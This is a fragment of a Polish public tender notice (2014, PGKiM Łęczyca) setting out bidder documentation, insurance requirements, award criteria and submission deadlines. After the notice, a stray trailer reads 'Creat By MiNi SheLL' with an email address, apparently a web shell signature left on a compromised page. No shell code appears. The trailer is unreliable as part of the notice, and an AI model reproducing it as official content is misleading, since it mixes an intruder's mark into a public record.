</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie należy złożyć :
1) Aktualny odpis z właściwego rejestru albo zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie 	wcześniej niż 6 miesięcy przed terminem składania ofert potwierdzający prowadzenie działalności gospodarczej w zakresie prowadzenia ww prac.
2)  Opłaconą polisę ( z dowodami wpłaty), a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę min. 500 000,00 zł.
3) Jeżeli wykonawca, polega na zdolnościach finansowych innych podmiotów wymaga się przedłożenia stosownej informacji, dotyczącej tych podmiotów.
Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia  lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Formularz ofertowy. 2.Pełnomocnictwo do podpisania oferty, oświadczeń i dokumentów składających się na ofertę, o ile pełnomocnictwo to nie wynika z innych dokumentów dołączonych do oferty - pełnomocnictwo należy przedstawić w formie oryginału, podpisane przez Wykonawcę lub w formie kserokopii poświadczonej za zgodność z oryginałem przez notariusza. 3.Parafowany projekt umowy.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza zmianę zawartej umowy w następujących okolicznościach;
a) wystąpienie nieprzewidzianych przeszkód i utrudnień formalno - prawnych, zdarzeń nadzwyczajnych, katastrof, operacji wojennych, klęsk żywiołowych, itp.,
b)zmiany w obowiązujących przepisach, jeżeli zgodnie z nimi konieczne będzie dostosowanie treści umowy do aktualnego stanu prawnego, 
c)zmiana terminu wykonania zamówienia, jeżeli nastąpi wydłużenie terminów wydawania decyzji administracyjnych poza podstawowe terminy określone w KPA, a wydłużenie to nie będzie wynikać z winy Wykonawcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pgkimleczyca.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Można uzyskać równiez bezpośrednio w siedzibie zamawiającego pok. nr 8..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.06.2014 godzina 09:30, miejsce: Ofertę należy złożyć w siedzibie Zamawiającego - sekretariat PGKiM w Łęczycy Sp. z o.o., ul. Tumska 2, 99-100 Łęczyca..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com